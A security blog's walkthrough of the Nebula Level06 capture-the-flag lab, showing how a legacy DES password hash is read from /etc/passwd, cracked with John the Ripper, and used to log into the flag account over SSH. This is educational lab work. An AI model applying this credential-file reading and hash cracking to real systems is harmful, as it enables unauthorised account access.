Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level06

Level06 specifies that “The flag06 account credentials came from a legacy unix system.”

I believe the hint spells out exactly what we need to solve this level.

Legacy unix systems stored the password hashes in /etc/passwd, which is world-readable. Modern systems use the shadow file to store this sensitive information.

A quick grep statement should confirm if my suspicions are correct.

    level06@nebula:~$ grep flag06 /etc/passwd
    flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Perfect, the line for the flag06 account contains a password hash instead of the ‘x’ that would be displayed on a modern system utilizing /etc/shadow.

Time to fire up John the Ripper to crack the hash:

    foo@kali:~$ john flag06
    Using default input encoding: UTF-8
    Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    hello            (flag06)
    1g 0:00:00:00 DONE 2/3 (2016-02-06 01:17) 100.0g/s 881200p/s 881200c/s 881200C/s 123456..nutmegs
Use the "--show" option to display all of the cracked passwords reliably
    Session completed

John quickly identifies the password as ‘hello’. Time to test:

    level06@nebula:~$ ssh flag06@localhost
    The authenticity of host 'localhost (127.0.0.1)' can't be established.
    RSA key fingerprint is 67:fe:f4:09:cd:0f:ba:dd:87:2b:73:2c:80:31:c2:68.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added 'localhost' (RSA) to the list of known hosts.

        _   __     __          __
       / | / /__  / /_  __  __/ /___ _
      /  |/ / _ \/ __ \/ / / / / __ `/
     / /|  /  __/ /_/ / /_/ / / /_/ /
    /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula


    For level descriptions, please see the above URL.

    To log in, use the username of "levelXX" and password "levelXX", where
    XX is the level number.

    There are currently 20 levels (00 - 19).



    flag06@localhost's password:
    Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

    * Documentation:  https://help.ubuntu.com/
    New release '12.04 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.


    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    flag06@nebula:~$ getflag
    You have successfully executed getflag on a target account

The password worked, I was able to successfully log into the flag06 account and run getflag.

Mike